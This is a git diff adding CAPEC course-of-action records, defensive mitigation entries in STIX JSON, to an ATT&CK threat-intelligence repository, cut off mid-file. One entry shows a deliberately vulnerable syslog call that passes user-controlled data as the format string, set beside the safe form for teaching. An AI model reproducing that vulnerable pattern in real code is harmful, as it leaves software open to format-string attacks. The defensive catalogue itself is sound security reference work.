diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json new file mode 100644 index 0000000000000000000000000000000000000000..83abb7f1c9cfb4110e37769e41d4c98b3a4ccd6a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--68c438dc-a9ed-4786-908c-2cf90a5bab66", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly restrict the location of the software being used.", + "id": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json new file mode 100644 index 0000000000000000000000000000000000000000..e86f969763daf3f6b97f4f73b6451a4bbef9e018 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--c48f2a77-7ad5-4c15-8308-2f7f2a50f015", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json new file mode 100644 index 0000000000000000000000000000000000000000..d084ce03484bf750c6138c4aa596064f5eb0c792 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--25e51895-2b4b-4be7-b6e0-e664a5f0f566", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "id": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617.json new file mode 100644 index 0000000000000000000000000000000000000000..2c8ea725861d511d3dec54889825047825d09bc6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--ecbe37b2-94e5-40ec-8843-4689a5877e90", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test your path decoding process against malicious input.", + "id": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json new file mode 100644 index 0000000000000000000000000000000000000000..1ff754bae06ecd6296144d5db94a1d357ad8f01c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--07eef5b2-e628-49fb-b195-16de5a6b726e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json new file mode 100644 index 0000000000000000000000000000000000000000..e0e7946090f8e8442f56b6b64d741e40f450281b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fd726d12-a644-4215-99c7-1c3bfddc3cd9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure your firewall to block egress ICMP messages.", + "id": "course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-298-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json new file mode 100644 index 0000000000000000000000000000000000000000..add3b13dbb24e888e287634b9abe3399e68f4abf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f93cb411-fd97-4812-8730-44f8c8acbab2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "id": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json new file mode 100644 index 0000000000000000000000000000000000000000..e90cd720a5f54db747575d2daf64be7242f4642a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--8e14037f-4f9a-4d84-bff1-b543f112481f", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "id": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-579-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json new file mode 100644 index 0000000000000000000000000000000000000000..d3474805b27903635008c2224c2ae804b001e6e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--7a7923a9-99ac-45f0-9a38-ea71a9c29e76", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "id": "course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-67-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json new file mode 100644 index 0000000000000000000000000000000000000000..d4a065c0f8423a1ea847246068845a67b01a1da0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--782c74cc-89c9-4d26-b487-13893fee8228", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of all devices that contain secret key information. (even when devices are not in use)", + "id": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e.json new file mode 100644 index 0000000000000000000000000000000000000000..0c2333f6cf4e709e8672a9eee552b70d29b1c083 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0eeef219-2dce-4fc6-af8d-801492c01a95", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If you have to use dangerous functions, make sure that you do boundary checking.", + "id": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json new file mode 100644 index 0000000000000000000000000000000000000000..974e570d35e0de933ab7c55f6ec4cd609d1c969e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--5f8a95f1-d33c-4164-8753-e4e1c1cdea1d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "id": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json new file mode 100644 index 0000000000000000000000000000000000000000..a1706acfdde5fa6a596cb55d2326f3988a53dbb2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--6d0c03e4-bc30-4b7b-ae13-ad4be1357051", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.", + "id": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json new file mode 100644 index 0000000000000000000000000000000000000000..cec2172b8fd7fcde81eea46976afe6824f6f4c3e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--624a388a-5622-4b16-a686-5118db487f52", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "id": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json new file mode 100644 index 0000000000000000000000000000000000000000..f28de15433e020b327c7dcb4fdccb652a30e478f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--445b68e5-baab-4f5a-963b-82961088a9ba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use synchronization to control the flow of execution.", + "id": "course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-26-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json new file mode 100644 index 0000000000000000000000000000000000000000..4a7c428cf985009b339884c2676ab505fbaeed1c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--dda89e00-07ce-4011-8046-d5e9378a2298", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that all session tokens use a good source of randomness", + "id": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json new file mode 100644 index 0000000000000000000000000000000000000000..5a50c76d4d2869d05847db9996c1478d152a7d81 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--423da781-1184-4a7d-95c4-ab881cbdf395", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "id": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json new file mode 100644 index 0000000000000000000000000000000000000000..a74a9ec3c60537bcd8759893cc865c69597214e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e83b9e73-5a90-40e4-8bc8-84e24644bb72", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "id": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json new file mode 100644 index 0000000000000000000000000000000000000000..78718cf494b050b16ac2bcdca64202baf011fd89 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3a37c5dd-6d87-427a-b561-179d0c3abde2", + "objects": [ + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Include \"hosts file\"/IP address in the application", + "id": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json new file mode 100644 index 0000000000000000000000000000000000000000..7ae0679146b0749975edd6a7c08e96764978341c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--3b182914-d1e8-4926-9f83-fcae45ff8c4e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-19-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json new file mode 100644 index 0000000000000000000000000000000000000000..1b2323d8c7dc3eebb9a08101ff6111ee58560474 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--ea992934-99f2-40ff-ba85-8960d32068b0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Input should be encoded prior to use in commands to make sure command related characters are not treated as part of the command. For example, quotation characters may need to be encoded so that the application does not treat the quotation as a delimiter.", + "id": "course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-248-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json new file mode 100644 index 0000000000000000000000000000000000000000..e780d00d646bbcee241588190769ae89af65b0c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--df55fcd4-34e6-45d7-a7b9-eae708c4cc88", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for any input that will be included in any subsequent web pages or back end operations.", + "id": "course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-247-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json new file mode 100644 index 0000000000000000000000000000000000000000..ba59575531db1fd430bf09e4090b82fc459fd42f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--d8fee43f-ef43-4a26-afc9-f68c19795862", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct detailed vendor assessment before acquiring COTS hardware.", + "id": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json new file mode 100644 index 0000000000000000000000000000000000000000..2b2017c09a8c7491bdfa30e0c02af69cff339bda --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--979aeccf-3784-4104-97d8-e3178dfaa666", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + 